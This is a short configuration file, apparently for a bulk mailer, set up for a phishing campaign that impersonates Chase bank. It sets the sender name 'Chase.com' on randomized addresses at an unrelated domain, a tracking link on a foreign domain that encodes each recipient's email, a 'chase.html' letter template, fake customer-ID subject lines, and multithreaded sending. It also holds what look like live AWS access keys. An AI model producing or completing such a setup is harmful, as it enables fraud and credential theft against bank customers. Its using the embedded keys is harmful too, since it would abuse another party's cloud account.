# aws config
region = 'us-east-1'
aws_key = 'AKIA23TOJLYMJ2JXRIV2'
aws_secret = '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'

# email list file
mailist = 'email.txt'

# From
fromtype = 'manual' # change to auto for auto from mail
frommail = ['noreply-{randomnum_8}@muhooewr.com']
fromname = ['Chase.com']

# Letter
link = 'https://ktln.atmentecnologia.com.br/{email_base64}'
letter = 'letter/chase.html'
subject = ['Info for customer id #{randomnum_6}']
charset = 'UTF-8'
lettertype = 'Html'
attachment = False # change to False to disable it

# sender config
sleep = 1
tread = 14
debug = True
duplicate = True # enable to send double email